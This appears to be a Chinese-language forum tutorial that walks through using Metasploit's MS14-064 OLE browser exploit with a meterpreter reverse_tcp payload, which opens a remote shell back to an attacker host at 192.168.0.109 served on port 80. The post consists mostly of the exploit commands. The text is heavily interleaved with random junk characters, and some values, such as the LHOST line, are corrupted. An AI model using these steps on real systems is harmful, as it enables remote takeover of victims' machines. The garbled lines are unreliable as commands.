, d/ A0 x4 j. H6 K6 i6 ?
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
" n6 Z2 J9 y; c$ B- Z( z
, G9 Y9 E) b1 `7 U$ n) E4 }
1 y) ]% M) N9 l6 x 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
- a0 D8 n7 V1 }* _' s3 Y" D
8 |4 i1 G7 ]- k6 V
0 c5 o* k! R% ^, v, T: s! h1 M0 K* ^. I 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
$ {& c7 D2 d# i! t1 ]+ o, O
% j, \# n& |8 t% v
: ?5 b6 q2 X; ]# o2 g
set AllowPowershellPrompt true
: n7 P3 b6 R. T' }8 G+ t# l
' F' c' ^4 z) n" Y6 T/ }/ [* Q& w; @7 }
Set LHOST 192.168.0.1095 x5 h8 |2 u+ N1 k4 W2 \. X
9 w$ E6 j( s1 X
f) V: c3 R; C' p, a set SRVHOST 192.168.0.109
" J$ a/ |8 \ V( Q0 t
9 e2 T6 [6 W* ], y% |# e& s+ W j1 {( _& r
Set uripath share9 Z9 y9 f8 V H6 [* l
' |: v! O9 I8 S. x
5 n5 B% v& U& X, y6 q Set srvport 80! ? r) C+ F; F5 {, j
% N! v: ?& H* P/ S) @, o
& M# s! k( S% s7 E6 q4 y
. T1 c& A) W! x
% o3 K$ l2 a: C6 h7 L( ]3 e x( L7 [9 ^' Q/ Y% H$ \
8 k/ I+ h6 o: t) J5 s' A
' Y) v; U9 o( [. K7 h
2 p4 m3 V4 U1 c3 D- p ( n$ B0 M, j% {; M' i
" H8 ~3 u. {# Y0 h0 ?0 J2 v* j1 ^; h* B* {& J' s* Q
8 }: |, g9 C) X
( k$ r+ n7 z; H" V, R9 V% a o
. }( Y+ h! J! N# X m ' U1 e1 V" O2 [! z8 B1 b
5 V8 N, ~! y2 o7 ]. F0 t" c
7 a& q% K& L% b6 Z% }3 F 下面我们来访问本地地址如图:
: K. b: |% Q6 ^) t, D" y; ]- X
* [5 e/ Q+ u/ A7 k8 P
4 m+ t' V1 t9 E6 F
3 S5 A y4 Z+ I! c
' ^0 Q6 {1 x, [ t; `3 ^/ R: r# k c5 J5 ?' T4 S: Q8 P
/ d# O8 y4 I. H* n: o
& T$ S1 m' @) C; F5 Q
0 u. u3 v# Q3 ]- Q5 ?6 @
: Y8 N' m; v" x4 ~, S- \